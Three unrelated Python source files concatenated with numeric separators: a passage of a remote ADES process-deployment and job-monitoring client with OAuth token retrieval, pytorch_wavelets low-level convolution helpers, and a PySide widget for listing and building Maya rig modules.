ades_usr = self.settings.get("ades.username", None)
ades_pwd = self.settings.get("ades.password", None)
ades_url = self.settings.get("ades.wso2_hostname", None)
ades_client = self.settings.get("ades.wso2_client_id", None)
ades_secret = self.settings.get("ades.wso2_client_secret", None)
access_token = None
if ades_usr and ades_pwd and ades_url and ades_client and ades_secret:
ades_body = {
"grant_type": "password",
"client_id": ades_client,
"client_secret": ades_secret,
"username": ades_usr,
"password": <PASSWORD>,
"scope": "openid",
}
ades_headers = {"Content-Type": CONTENT_TYPE_APP_FORM, "Accept": CONTENT_TYPE_APP_JSON}
ades_access_token_url = "{}/oauth2/token".format(ades_url)
cred_resp = request_extra("post", ades_access_token_url,
data=ades_body, headers=ades_headers, settings=self.settings)
cred_resp.raise_for_status()
if CONTENT_TYPE_APP_JSON not in cred_resp.headers.get("Content-Type"):
raise HTTPUnauthorized("Cannot retrieve valid access token using credential or ADES configurations.")
access_token = cred_resp.json().get("access_token", None)
if not access_token:
warnings.warn("Could not retrieve valid access token although response is expected to contain one.",
MissingParameterWarning)
else:
warnings.warn(
"Could not retrieve at least one of required login parameters: "
"[ades.username, ades.password, ades.wso2_hostname, ades.wso2_client_id, ades.wso2_client_secret]",
MissingParameterWarning
)
return {"Authorization": "Bearer {}".format(access_token) if access_token else None}
def is_deployed(self):
return self.describe_process() is not None
def is_visible(self):
# type: (...) -> Union[bool, None]
"""
Gets the process visibility.
:returns:
True/False correspondingly for public/private if visibility is retrievable,
False if authorized access but process cannot be found,
None if forbidden access.
"""
LOGGER.debug("Get process WPS visibility request for [%s]", self.process)
response = self.make_request(method="GET",
url=self.url + sd.process_visibility_service.path.format(process_id=self.process),
retry=False,
status_code_mock=HTTPUnauthorized.code)
if response.status_code in (HTTPUnauthorized.code, HTTPForbidden.code):
return None
if response.status_code == HTTPNotFound.code:
return False
if response.status_code == HTTPOk.code:
json_body = response.json()
# FIXME: support for Spacebel, always returns dummy visibility response, enforce deploy with `False`
if json_body.get("message") == "magic!" or json_body.get("type") == "ok" or json_body.get("code") == 4:
return False
return json_body.get("value") == VISIBILITY_PUBLIC
response.raise_for_status()
def set_visibility(self, visibility):
self.update_status("Updating process visibility on remote ADES.",
REMOTE_JOB_PROGRESS_VISIBLE, status.STATUS_RUNNING)
path = self.url + sd.process_visibility_service.path.format(process_id=self.process)
user_headers = deepcopy(self.headers)
user_headers.update(self.get_user_auth_header())
LOGGER.debug("Update process WPS visibility request for [%s] at [%s]", self.process, path)
response = self.make_request(method="PUT",
url=path,
json={"value": visibility},
retry=False,
status_code_mock=HTTPOk.code)
response.raise_for_status()
def describe_process(self):
path = self.url + sd.process_service.path.format(process_id=self.process)
LOGGER.debug("Describe process WPS request for [%s] at [%s]", self.process, path)
response = self.make_request(method="GET",
url=path,
retry=False,
status_code_mock=HTTPOk.code)
if response.status_code == HTTPOk.code:
# FIXME: Remove patch for Geomatys ADES (Missing process return a 200 InvalidParameterValue error !)
            if response.text.lower().find("invalidparametervalue") >= 0:
                return None
return response.json()
elif response.status_code == HTTPNotFound.code:
return None
# FIXME: Remove patch for Spacebel ADES (Missing process return a 500 error)
elif response.status_code == HTTPInternalServerError.code:
return None
response.raise_for_status()
def deploy(self):
self.update_status("Deploying process on remote ADES.",
REMOTE_JOB_PROGRESS_DEPLOY, status.STATUS_RUNNING)
path = self.url + sd.processes_service.path
user_headers = deepcopy(self.headers)
user_headers.update(self.get_user_auth_header())
LOGGER.debug("Deploy process WPS request for [%s] at [%s]", self.process, path)
response = self.make_request(method="POST", url=path, json=self.deploy_body, retry=True,
status_code_mock=HTTPOk.code)
response.raise_for_status()
def prepare(self):
visible = self.is_visible()
if not visible: # includes private visibility and non-existing cases
if visible is None:
LOGGER.info("Process [%s] access is unauthorized on [%s] - deploying as admin.", self.process, self.url)
elif visible is False:
LOGGER.info("Process [%s] is not deployed on [%s] - deploying.", self.process, self.url)
# TODO: Maybe always redeploy? What about cases of outdated deployed process?
try:
self.deploy()
except Exception as exc:
# FIXME: support for Spacebel, avoid conflict error incorrectly handled, remove 500 when fixed
pass_http_error(exc, [HTTPConflict, HTTPInternalServerError])
if visible:
LOGGER.info("Process [%s] already deployed and visible on [%s] - executing.", self.process, self.url)
else:
LOGGER.info("Process [%s] enforced to public visibility.", self.process)
try:
self.set_visibility(visibility=VISIBILITY_PUBLIC)
# TODO: support for Spacebel, remove when visibility route properly implemented on ADES
except Exception as exc:
pass_http_error(exc, HTTPNotFound)
def execute(self, workflow_inputs, out_dir, expected_outputs):
self.update_status("Preparing process on remote ADES.",
REMOTE_JOB_PROGRESS_PREPARE, status.STATUS_RUNNING)
self.prepare()
self.update_status("Process ready for execute request on remote ADES.",
REMOTE_JOB_PROGRESS_READY, status.STATUS_RUNNING)
LOGGER.debug("Execute process WPS request for [%s]", self.process)
execute_body_inputs = self.stage_job_inputs(workflow_inputs)
execute_body_outputs = [
{"id": output, "transmissionMode": EXECUTE_TRANSMISSION_MODE_REFERENCE} for output in expected_outputs
]
self.update_status("Executing job on remote ADES.", REMOTE_JOB_PROGRESS_EXECUTION, status.STATUS_RUNNING)
execute_body = {
"mode": EXECUTE_MODE_ASYNC,
"response": EXECUTE_RESPONSE_DOCUMENT,
"inputs": execute_body_inputs,
"outputs": execute_body_outputs
}
request_url = self.url + sd.process_jobs_service.path.format(process_id=self.process)
response = self.make_request(method="POST", url=request_url, json=execute_body, retry=True)
if response.status_code != 201:
raise Exception("Was expecting a 201 status code from the execute request : {0}".format(request_url))
job_status_uri = response.headers["Location"]
job_id = self.monitor(job_status_uri)
self.update_status("Fetching job outputs from remote ADES.",
REMOTE_JOB_PROGRESS_FETCH_OUT, status.STATUS_RUNNING)
results = self.get_job_results(job_id)
self.stage_job_results(results, expected_outputs, out_dir)
self.update_status("Execution on remote ADES completed.",
REMOTE_JOB_PROGRESS_COMPLETED, status.STATUS_SUCCEEDED)
def monitor(self, job_status_uri):
job_status = self.get_job_status(job_status_uri)
job_status_value = status.map_status(job_status["status"])
job_id = job_status["jobID"]
self.update_status("Monitoring job on remote ADES : {0}".format(job_status_uri),
REMOTE_JOB_PROGRESS_MONITORING, status.STATUS_RUNNING)
while job_status_value not in status.JOB_STATUS_CATEGORIES[status.JOB_STATUS_CATEGORY_FINISHED]:
sleep(5)
job_status = self.get_job_status(job_status_uri)
job_status_value = status.map_status(job_status["status"])
LOGGER.debug(get_log_monitor_msg(job_id, job_status_value,
job_status.get("percentCompleted", 0),
get_any_message(job_status), job_status.get("statusLocation")))
self.update_status(get_job_log_msg(status=job_status_value,
message=get_any_message(job_status),
progress=job_status.get("percentCompleted", 0),
duration=job_status.get("duration", None)), # get if available
map_progress(job_status.get("percentCompleted", 0),
REMOTE_JOB_PROGRESS_MONITORING, REMOTE_JOB_PROGRESS_FETCH_OUT),
status.STATUS_RUNNING)
if job_status_value != status.STATUS_SUCCEEDED:
LOGGER.debug(get_log_monitor_msg(job_id, job_status_value,
job_status.get("percentCompleted", 0),
get_any_message(job_status), job_status.get("statusLocation")))
raise Exception(job_status)
return job_id
def get_job_status(self, job_status_uri, retry=True):
response = self.make_request(method="GET",
url=job_status_uri,
retry=True,
status_code_mock=HTTPNotFound.code)
# Retry on 404 since job may not be fully ready
if retry and response.status_code == HTTPNotFound.code:
sleep(5)
return self.get_job_status(job_status_uri, retry=False)
response.raise_for_status()
job_status = response.json()
# TODO Remove patch for Geomatys not conforming to the status schema
# - jobID is missing
# - handled by 'map_status': status are upper cases and succeeded process are indicated as successful
job_id = job_status_uri.split("/")[-1]
if "jobID" not in job_status:
job_status["jobID"] = job_id
job_status["status"] = status.map_status(job_status["status"])
return job_status
def get_job_results(self, job_id):
# type: (str) -> List[JSON]
"""
Obtains produced output results from successful job status ID.
"""
        # use the results endpoint instead of '/outputs' to ensure support with other implementations
result_url = self.url + sd.process_results_service.path.format(process_id=self.process, job_id=job_id)
response = self.make_request(method="GET", url=result_url, retry=True)
response.raise_for_status()
contents = response.json()
# backward compatibility for ADES that returns output IDs nested under 'outputs'
if "outputs" in contents:
# ensure that we don't incorrectly pick a specific output ID named 'outputs'
maybe_outputs = contents["outputs"]
if isinstance(maybe_outputs, dict) and get_any_id(maybe_outputs) is None:
contents = maybe_outputs
# backward compatibility for ADES that returns list of outputs nested under 'outputs'
# (i.e.: as Weaver-specific '/outputs' endpoint)
elif isinstance(maybe_outputs, list) and all(get_any_id(out) is not None for out in maybe_outputs):
contents = maybe_outputs
# rebuild the expected (old) list format for calling method
if isinstance(contents, dict) and all(get_any_value(out) is not None for out in contents.values()):
outputs = []
for out_id, out_val in contents.items():
out_val.update({"id": out_id})
outputs.append(out_val)
contents = outputs
return contents
def stage_job_results(self, results, expected_outputs, out_dir):
for result in results:
res_id = get_any_id(result)
            # CWL expects the output file to be written matching the definition in 'expected_outputs',
            # but this definition could be a glob pattern matching multiple files.
            # Therefore, we cannot rely on a specific name from it.
if res_id in expected_outputs:
# plan ahead when list of multiple output values could be supported
result_values = get_any_value(result)
if not isinstance(result_values, list):
result_values = [result_values]
cwl_out_dir = out_dir.rstrip("/")
for value in result_values:
src_name = value.split("/")[-1]
dst_path = "/".join([cwl_out_dir, src_name])
# performance improvement:
# Bypass download if file can be resolved as local resource (already fetched or same server).
# Because CWL expects the file to be in specified 'out_dir', make a link for it to be found
# even though the file is stored in the full job output location instead (already staged by step).
map_path = map_wps_output_location(value, self.settings)
as_link = False
if map_path:
LOGGER.info("Detected result [%s] from [%s] as local reference to this instance. "
"Skipping fetch and using local copy in output destination: [%s]",
res_id, value, dst_path)
LOGGER.debug("Mapped result [%s] to local reference: [%s]", value, map_path)
src_path = map_path
as_link = True
else:
LOGGER.info("Fetching result [%s] from [%s] to CWL output destination: [%s]",
res_id, value, dst_path)
src_path = value
fetch_file(src_path, cwl_out_dir, settings=self.settings, link=as_link)
def stage_job_inputs(self, workflow_inputs):
execute_body_inputs = []
for workflow_input_key, workflow_input_value in workflow_inputs.items():
if not isinstance(workflow_input_value, list):
workflow_input_value = [workflow_input_value]
for workflow_input_value_item in workflow_input_value:
if isinstance(workflow_input_value_item, dict) and "location" in workflow_input_value_item:
location = workflow_input_value_item["location"]
execute_body_inputs.append({"id": workflow_input_key, "href": location})
else:
execute_body_inputs.append({"id": workflow_input_key, "data": workflow_input_value_item})
for exec_input in execute_body_inputs:
if "href" in exec_input and isinstance(exec_input["href"], str):
LOGGER.debug("Original input location [%s] : [%s]", exec_input["id"], exec_input["href"])
if exec_input["href"].startswith("{0}://".format(OPENSEARCH_LOCAL_FILE_SCHEME)):
exec_input["href"] = "file{0}".format(exec_input["href"][len(OPENSEARCH_LOCAL_FILE_SCHEME):])
LOGGER.debug("OpenSearch intermediate input [%s] : [%s]", exec_input["id"], exec_input["href"])
elif exec_input["href"].startswith("file://"):
exec_input["href"] = self.host_file(exec_input["href"])
LOGGER.debug("Hosting intermediate input [%s] : [%s]", exec_input["id"], exec_input["href"])
return execute_body_inputs
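# --- Illustrative sketch (hypothetical values) of the mapping performed by stage_job_inputs ---
# workflow_inputs = {
#     "image": {"location": "https://example.com/scene.tif"},   # reference input -> 'href'
#     "bands": ["B4", "B8"],                                     # literal values -> one 'data' entry each
# }
# would be converted into the execute body inputs:
# [
#     {"id": "image", "href": "https://example.com/scene.tif"},
#     {"id": "bands", "data": "B4"},
#     {"id": "bands", "data": "B8"},
# ]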
|
498990
|
from __future__ import absolute_import
import torch
import torch.nn.functional as F
import numpy as np
from pytorch_wavelets.utils import symm_pad_1d as symm_pad
def as_column_vector(v):
"""Return *v* as a column vector with shape (N,1).
"""
v = np.atleast_2d(v)
if v.shape[0] == 1:
return v.T
else:
return v
def _as_row_vector(v):
"""Return *v* as a row vector with shape (1, N).
"""
v = np.atleast_2d(v)
if v.shape[0] == 1:
return v
else:
return v.T
def _as_row_tensor(h):
if isinstance(h, torch.Tensor):
h = torch.reshape(h, [1, -1])
else:
h = as_column_vector(h).T
h = torch.tensor(h, dtype=torch.get_default_dtype())
return h
def _as_col_vector(v):
"""Return *v* as a column vector with shape (N,1).
"""
v = np.atleast_2d(v)
if v.shape[0] == 1:
return v.T
else:
return v
def _as_col_tensor(h):
if isinstance(h, torch.Tensor):
h = torch.reshape(h, [-1, 1])
else:
h = as_column_vector(h)
h = torch.tensor(h, dtype=torch.get_default_dtype())
return h
def prep_filt(h, c, transpose=False):
""" Prepares an array to be of the correct format for pytorch.
    Can also specify whether to make it a row filter (set transpose=True)"""
h = _as_col_vector(h)[::-1]
h = h[None, None, :]
h = np.repeat(h, repeats=c, axis=0)
if transpose:
h = h.transpose((0,1,3,2))
h = np.copy(h)
return torch.tensor(h, dtype=torch.get_default_dtype())
def colfilter(X, h, mode='symmetric'):
if X is None or X.shape == torch.Size([]):
return torch.zeros(1,1,1,1, device=X.device)
b, ch, row, col = X.shape
m = h.shape[2] // 2
if mode == 'symmetric':
xe = symm_pad(row, m)
X = F.conv2d(X[:,:,xe], h.repeat(ch,1,1,1), groups=ch)
else:
X = F.conv2d(X, h.repeat(ch, 1, 1, 1), groups=ch, padding=(m, 0))
return X
def rowfilter(X, h, mode='symmetric'):
if X is None or X.shape == torch.Size([]):
return torch.zeros(1,1,1,1, device=X.device)
b, ch, row, col = X.shape
m = h.shape[2] // 2
h = h.transpose(2,3).contiguous()
if mode == 'symmetric':
xe = symm_pad(col, m)
X = F.conv2d(X[:,:,:,xe], h.repeat(ch,1,1,1), groups=ch)
else:
X = F.conv2d(X, h.repeat(ch,1,1,1), groups=ch, padding=(0, m))
return X
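# --- Hedged usage sketch (filter taps below are illustrative, not library-shipped coefficients) ---
#   x = torch.randn(1, 3, 32, 32)
#   h = prep_filt([-0.05, 0.25, 0.6, 0.25, -0.05], c=1)   # single-channel filter; colfilter repeats it per channel
#   lo_cols = colfilter(x, h, mode='symmetric')            # filter along the column direction
#   lo_rows = rowfilter(lo_cols, h, mode='symmetric')      # then along the row direction
#   assert lo_rows.shape == x.shape                        # symmetric padding keeps the spatial size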
def coldfilt(X, ha, hb, highpass=False, mode='symmetric'):
if X is None or X.shape == torch.Size([]):
return torch.zeros(1,1,1,1, device=X.device)
batch, ch, r, c = X.shape
r2 = r // 2
if r % 4 != 0:
raise ValueError('No. of rows in X must be a multiple of 4\n' +
'X was {}'.format(X.shape))
if mode == 'symmetric':
m = ha.shape[2]
xe = symm_pad(r, m)
X = torch.cat((X[:,:,xe[2::2]], X[:,:,xe[3::2]]), dim=1)
h = torch.cat((ha.repeat(ch, 1, 1, 1), hb.repeat(ch, 1, 1, 1)), dim=0)
X = F.conv2d(X, h, stride=(2,1), groups=ch*2)
else:
raise NotImplementedError()
    # Reshape result to be shape [batch, ch, r/2, c]. This reshaping
    # interleaves the rows
if highpass:
X = torch.stack((X[:, ch:], X[:, :ch]), dim=-2).view(batch, ch, r2, c)
else:
X = torch.stack((X[:, :ch], X[:, ch:]), dim=-2).view(batch, ch, r2, c)
return X
def rowdfilt(X, ha, hb, highpass=False, mode='symmetric'):
if X is None or X.shape == torch.Size([]):
return torch.zeros(1,1,1,1, device=X.device)
batch, ch, r, c = X.shape
c2 = c // 2
if c % 4 != 0:
raise ValueError('No. of cols in X must be a multiple of 4\n' +
'X was {}'.format(X.shape))
if mode == 'symmetric':
m = ha.shape[2]
xe = symm_pad(c, m)
X = torch.cat((X[:,:,:,xe[2::2]], X[:,:,:,xe[3::2]]), dim=1)
h = torch.cat((ha.reshape(1,1,1,m).repeat(ch, 1, 1, 1),
hb.reshape(1,1,1,m).repeat(ch, 1, 1, 1)), dim=0)
X = F.conv2d(X, h, stride=(1,2), groups=ch*2)
else:
raise NotImplementedError()
    # Reshape result to be shape [batch, ch, r, c/2]. This reshaping
    # interleaves the columns
if highpass:
Y = torch.stack((X[:, ch:], X[:, :ch]), dim=-1).view(batch, ch, r, c2)
else:
Y = torch.stack((X[:, :ch], X[:, ch:]), dim=-1).view(batch, ch, r, c2)
return Y
def colifilt(X, ha, hb, highpass=False, mode='symmetric'):
if X is None or X.shape == torch.Size([]):
return torch.zeros(1,1,1,1, device=X.device)
m = ha.shape[2]
m2 = m // 2
hao = ha[:,:,1::2]
hae = ha[:,:,::2]
hbo = hb[:,:,1::2]
hbe = hb[:,:,::2]
batch, ch, r, c = X.shape
if r % 2 != 0:
raise ValueError('No. of rows in X must be a multiple of 2.\n' +
'X was {}'.format(X.shape))
xe = symm_pad(r, m2)
if m2 % 2 == 0:
h1 = hae
h2 = hbe
h3 = hao
h4 = hbo
if highpass:
X = torch.cat((X[:,:,xe[1:-2:2]], X[:,:,xe[:-2:2]], X[:,:,xe[3::2]], X[:,:,xe[2::2]]), dim=1)
else:
X = torch.cat((X[:,:,xe[:-2:2]], X[:,:,xe[1:-2:2]], X[:,:,xe[2::2]], X[:,:,xe[3::2]]), dim=1)
else:
h1 = hao
h2 = hbo
h3 = hae
h4 = hbe
if highpass:
X = torch.cat((X[:,:,xe[2:-1:2]], X[:,:,xe[1:-1:2]], X[:,:,xe[2:-1:2]], X[:,:,xe[1:-1:2]]), dim=1)
else:
X = torch.cat((X[:,:,xe[1:-1:2]], X[:,:,xe[2:-1:2]], X[:,:,xe[1:-1:2]], X[:,:,xe[2:-1:2]]), dim=1)
h = torch.cat((h1.repeat(ch, 1, 1, 1), h2.repeat(ch, 1, 1, 1),
h3.repeat(ch, 1, 1, 1), h4.repeat(ch, 1, 1, 1)), dim=0)
X = F.conv2d(X, h, groups=4*ch)
# Stack 4 tensors of shape [batch, ch, r2, c] into one tensor
# [batch, ch, r2, 4, c]
X = torch.stack([X[:,:ch], X[:,ch:2*ch], X[:,2*ch:3*ch], X[:,3*ch:]], dim=3).view(batch, ch, r*2, c)
return X
def rowifilt(X, ha, hb, highpass=False, mode='symmetric'):
if X is None or X.shape == torch.Size([]):
return torch.zeros(1,1,1,1, device=X.device)
m = ha.shape[2]
m2 = m // 2
hao = ha[:,:,1::2]
hae = ha[:,:,::2]
hbo = hb[:,:,1::2]
hbe = hb[:,:,::2]
batch, ch, r, c = X.shape
if c % 2 != 0:
raise ValueError('No. of cols in X must be a multiple of 2.\n' +
'X was {}'.format(X.shape))
xe = symm_pad(c, m2)
if m2 % 2 == 0:
h1 = hae
h2 = hbe
h3 = hao
h4 = hbo
if highpass:
X = torch.cat((X[:,:,:,xe[1:-2:2]], X[:,:,:,xe[:-2:2]], X[:,:,:,xe[3::2]], X[:,:,:,xe[2::2]]), dim=1)
else:
X = torch.cat((X[:,:,:,xe[:-2:2]], X[:,:,:,xe[1:-2:2]], X[:,:,:,xe[2::2]], X[:,:,:,xe[3::2]]), dim=1)
else:
h1 = hao
h2 = hbo
h3 = hae
h4 = hbe
if highpass:
X = torch.cat((X[:,:,:,xe[2:-1:2]], X[:,:,:,xe[1:-1:2]], X[:,:,:,xe[2:-1:2]], X[:,:,:,xe[1:-1:2]]), dim=1)
else:
X = torch.cat((X[:,:,:,xe[1:-1:2]], X[:,:,:,xe[2:-1:2]], X[:,:,:,xe[1:-1:2]], X[:,:,:,xe[2:-1:2]]), dim=1)
h = torch.cat((h1.repeat(ch, 1, 1, 1), h2.repeat(ch, 1, 1, 1),
h3.repeat(ch, 1, 1, 1), h4.repeat(ch, 1, 1, 1)),
dim=0).reshape(4*ch, 1, 1, m2)
X = F.conv2d(X, h, groups=4*ch)
    # Stack 4 tensors of shape [batch, ch, r, c/2] into one tensor
    # [batch, ch, r, c/2, 4]
X = torch.stack([X[:,:ch], X[:,ch:2*ch], X[:,2*ch:3*ch], X[:,3*ch:]], dim=4).view(batch, ch, r, c*2)
return X
def q2c(y, dim=-1):
"""
Convert from quads in y to complex numbers in z.
"""
# Arrange pixels from the corners of the quads into
# 2 subimages of alternate real and imag pixels.
# a----b
# | |
# | |
# c----d
# Combine (a,b) and (d,c) to form two complex subimages.
y = y/np.sqrt(2)
    a, b = y[:,:, 0::2, 0::2], y[:,:, 0::2, 1::2]
    c, d = y[:,:, 1::2, 0::2], y[:,:, 1::2, 1::2]
# return torch.stack((a-d, b+c), dim=dim), torch.stack((a+d, b-c), dim=dim)
return ((a-d, b+c), (a+d, b-c))
def c2q(w1, w2):
"""
Scale by gain and convert from complex w(:,:,1:2) to real quad-numbers
in z.
Arrange pixels from the real and imag parts of the 2 highpasses
into 4 separate subimages .
A----B Re Im of w(:,:,1)
| |
| |
C----D Re Im of w(:,:,2)
"""
w1r, w1i = w1
w2r, w2i = w2
x1 = w1r + w2r
x2 = w1i + w2i
x3 = w1i - w2i
x4 = -w1r + w2r
    # Get the shape of the tensor excluding the real/imaginary part
b, ch, r, c = w1r.shape
# Create new empty tensor and fill it
y = w1r.new_zeros((b, ch, r*2, c*2), requires_grad=w1r.requires_grad)
    y[:, :, 0::2, 0::2] = x1
    y[:, :, 0::2, 1::2] = x2
    y[:, :, 1::2, 0::2] = x3
    y[:, :, 1::2, 1::2] = x4
y /= np.sqrt(2)
return y
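# Round-trip sketch: q2c and c2q above are exact inverses because the 1/sqrt(2)
# scaling is applied once in each direction, i.e. for a tensor with even height
# and width:
#
#   y = torch.randn(1, 3, 8, 8)
#   w1, w2 = q2c(y)
#   assert torch.allclose(c2q(w1, w2), y, atol=1e-6)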
|
499078
|
import re
import functools
import inspect
import traceback
import logging
import pymel.core as pymel
from PySide import QtCore
from PySide import QtGui
from ui import widget_list_modules
from omtk.libs import libSkinning
from omtk.libs import libQt
from omtk.libs import libPython
from omtk.libs import libPymel
from omtk.core import constants
from omtk.core import classModule
from omtk.core import classRig
import ui_shared
log = logging.getLogger('omtk')
class WidgetListModules(QtGui.QWidget):
needExportNetwork = QtCore.Signal()
_color_invalid = QtGui.QBrush(QtGui.QColor(255, 45, 45))
_color_valid = QtGui.QBrush(QtGui.QColor(45, 45, 45))
_color_locked = QtGui.QBrush(QtGui.QColor(125, 125, 125))
def __init__(self, parent=None):
super(WidgetListModules, self).__init__(parent=parent)
self._rig = None
self._rigs = None
self._is_modifying = False # todo: document
self.ui = widget_list_modules.Ui_Form()
self.ui.setupUi(self)
# Tweak gui
self.ui.treeWidget.setStyleSheet(ui_shared._STYLE_SHEET)
# Connect signal
# Connect events
self.ui.lineEdit_search.textChanged.connect(self.on_module_query_changed)
self.ui.treeWidget.itemSelectionChanged.connect(self.on_module_selection_changed)
self.ui.treeWidget.itemChanged.connect(self.on_module_changed)
self.ui.treeWidget.itemDoubleClicked.connect(self.on_module_double_clicked)
self.ui.treeWidget.focusInEvent = self.focus_in_module
self.ui.treeWidget.customContextMenuRequested.connect(self.on_context_menu_request)
self.ui.btn_update.pressed.connect(self.update)
def set_rigs(self, rig, update=True):
self._rigs = rig
self._rig = next(iter(self._rigs), None)
if update:
self.update()
def get_selected_networks(self):
result = []
for item in self.ui.treeWidget.selectedItems():
if hasattr(item, 'net'):
result.append(item.net)
return result
def get_selected_modules(self):
result = []
for item in self.ui.treeWidget.selectedItems():
val = item.rig
result.append(val)
return result
def update(self, *args, **kwargs):
self.ui.treeWidget.clear()
if not self._rigs:
return
for root in self._rigs:
qItem = self._rig_to_tree_widget(root)
self.ui.treeWidget.addTopLevelItem(qItem)
self.ui.treeWidget.expandItem(qItem)
self.refresh_ui()
def refresh_ui(self):
self._refresh_ui_modules_checked()
self._refresh_ui_modules_visibility()
def _refresh_ui_modules_checked(self):
# Block the signal to make sure that the itemChanged event is not called when adjusting the check state
self.ui.treeWidget.blockSignals(True)
for qt_item in libQt.get_all_QTreeWidgetItem(self.ui.treeWidget):
if hasattr(qt_item, "rig"):
qt_item.setCheckState(0, QtCore.Qt.Checked if qt_item.rig.is_built() else QtCore.Qt.Unchecked)
self.ui.treeWidget.blockSignals(False)
def _refresh_ui_modules_visibility(self, query_regex=None):
if query_regex is None:
query_raw = self.ui.lineEdit_search.text()
query_regex = ".*{0}.*".format(query_raw) if query_raw else ".*"
def fn_can_show(qItem, query_regex):
            # Always show non-module items
if not hasattr(qItem, 'rig'):
return True
if not isinstance(qItem.rig, classModule.Module):
return True
module = qItem.rig # Retrieve monkey-patched data
module_name = str(module)
return not query_regex or re.match(query_regex, module_name, re.IGNORECASE)
# unselectableBrush = QtGui.QBrush(QtCore.Qt.darkGray)
# selectableBrush = QtGui.QBrush(QtCore.Qt.white)
for qt_item in libQt.get_all_QTreeWidgetItem(self.ui.treeWidget):
can_show = fn_can_show(qt_item, query_regex)
qt_item.setHidden(not can_show)
    # setText is wrapped with blockSignals in a helper; calling it directly from
    # a signal handler would re-trigger the itemChanged signal.
    def _set_text_block(self, item, text):
        self.ui.treeWidget.blockSignals(True)
        if hasattr(item, "rig"):
            item.setText(0, text)
        self.ui.treeWidget.blockSignals(False)
def _can_build(self, data, verbose=True):
validate_message = None
try:
if isinstance(data, classRig.Rig):
data.validate()
elif isinstance(data, classModule.Module):
data.validate()
else:
raise Exception("Unexpected datatype {0} for {1}".format(type(data), data))
        except Exception as e:
if verbose:
validate_message = str(e)
pymel.warning("{0} failed validation: {1}".format(data, str(e)))
return False, validate_message
return True, validate_message
def _build_module(self, module):
if module.locked:
pymel.warning("Can't build locked module {0}".format(module))
return
self._rig.pre_build()
module.build()
self._rig.post_build_module(module)
return True
def _unbuild_module(self, module):
if module.locked:
pymel.warning("Can't unbuild locked module {0}".format(module))
return
module.unbuild()
return True
def _build(self, val):
if val.is_built():
pymel.warning("Can't build {0}, already built.".format(val))
return
try:
if isinstance(val, classModule.Module):
self._build_module(val)
elif isinstance(val, classRig.Rig):
val.build()
else:
raise Exception("Unexpected datatype {0} for {1}".format(type(val), val))
        except Exception as e:
log.error("Error building {0}. Received {1}. {2}".format(val, type(e).__name__, str(e).strip()))
traceback.print_exc()
def _unbuild(self, val):
if not val.is_built():
pymel.warning("Can't unbuild {0}, already unbuilt.".format(val))
return
try:
if isinstance(val, classModule.Module):
self._unbuild_module(val)
elif isinstance(val, classRig.Rig):
val.unbuild()
else:
raise Exception("Unexpected datatype {0} for {1}".format(type(val), val))
        except Exception as e:
            log.error("Error unbuilding {0}. Received {1}. {2}".format(val, type(e).__name__, str(e).strip()))
traceback.print_exc()
def _rig_to_tree_widget(self, module):
qItem = QtGui.QTreeWidgetItem(0)
if hasattr(module, '_network'):
qItem.net = module._network
else:
pymel.warning("{0} have no _network attributes".format(module))
qItem.rig = module
# Set label
label = str(module)
if isinstance(module, classModule.Module) and module.locked:
label += ' (locked)'
qItem.setText(0, label)
        # HACK: bypass the stylesheet
# see: http://forum.qt.io/topic/22219/item-view-stylesheet-bgcolor/12
# style_sheet_invalid = """
# QTreeView::item
# {
# background-color: rgb(45,45,45);
# }"""
self._set_QTreeWidgetItem_color(qItem, module)
qItem._name = qItem.text(0)
qItem._checked = module.is_built()
qItem.setFlags(qItem.flags() | QtCore.Qt.ItemIsEditable)
qItem.setCheckState(0, QtCore.Qt.Checked if module.is_built() else QtCore.Qt.Unchecked)
if isinstance(module, classRig.Rig):
qItem.setIcon(0, QtGui.QIcon(":/out_character.png"))
sorted_modules = sorted(module, key=lambda mod: mod.name)
for child in sorted_modules:
qSubItem = self._rig_to_tree_widget(child)
qSubItem.setIcon(0, QtGui.QIcon(":/out_objectSet.png"))
for input in child.input:
qInputItem = QtGui.QTreeWidgetItem(0)
qInputItem.setText(0, input.name())
ui_shared._set_icon_from_type(input, qInputItem)
qInputItem.setFlags(qItem.flags() & QtCore.Qt.ItemIsSelectable)
qSubItem.addChild(qInputItem)
qItem.addChild(qSubItem)
return qItem
def _set_QTreeWidgetItem_color(self, qItem, module):
        desired_color = None
        # Set the QTreeWidgetItem gray if the module is locked
        if isinstance(module, classModule.Module) and module.locked:
            qItem.setBackground(0, self._color_locked)
            return
        # Set the QTreeWidgetItem red if the module fails validation
can_build, validation_message = self._can_build(module, verbose=True)
if not can_build:
desired_color = self._color_invalid
msg = 'Validation failed for {0}: {1}'.format(module, validation_message)
log.warning(msg)
qItem.setToolTip(0, msg)
if desired_color:
qItem.setBackground(0, desired_color)
#
# Events
#
def on_build_selected(self):
for val in self.get_selected_modules():
self._build(val)
ui_shared._update_network(self._rig)
self.update()
def on_unbuild_selected(self):
for qItem in self.ui.treeWidget.selectedItems():
val = qItem.rig
self._unbuild(val)
ui_shared._update_network(self._rig)
self.update()
def on_rebuild_selected(self):
for qItem in self.ui.treeWidget.selectedItems():
val = qItem.rig
self._unbuild(val)
self._build(val)
ui_shared._update_network(self._rig)
def on_module_selection_changed(self):
pymel.select(self.get_selected_networks())
def on_module_changed(self, item):
# todo: handle exception
        # Check first if the checkbox has changed
need_update = False
new_state = item.checkState(0) == QtCore.Qt.Checked
new_text = item.text(0)
module = item.rig
if item._checked != new_state:
item._checked = new_state
# Handle checkbox change
if new_state:
self._build(module)
else:
self._unbuild(module)
need_update = True
ui_shared._update_network(self._rig, item=item)
        # Check if the name has changed
if (item._name != new_text):
item._name = new_text
module.name = new_text
# Update directly the network value instead of re-exporting it
if hasattr(item, "net"):
name_attr = item.net.attr("name")
name_attr.set(new_text)
# Ensure to only refresh the UI and not recreate all
if need_update:
self.refresh_ui()
def on_module_query_changed(self, *args, **kwargs):
self._refresh_ui_modules_visibility()
def on_context_menu_request(self):
if self.ui.treeWidget.selectedItems():
menu = QtGui.QMenu()
actionBuild = menu.addAction("Build")
actionBuild.triggered.connect(self.on_build_selected)
actionUnbuild = menu.addAction("Unbuild")
actionUnbuild.triggered.connect(self.on_unbuild_selected)
actionRebuild = menu.addAction("Rebuild")
actionRebuild.triggered.connect(self.on_rebuild_selected)
menu.addSeparator()
actionLock = menu.addAction("Lock")
actionLock.triggered.connect(self.on_lock_selected)
action_unlock = menu.addAction("Unlock")
action_unlock.triggered.connect(self.on_unlock_selected)
menu.addSeparator()
sel = self.ui.treeWidget.selectedItems()
if len(sel) == 1:
actionRemove = menu.addAction("Rename")
# actionRemove.triggered.connect(functools.partial(self.ui.treeWidget.editItem, sel[0], 0))
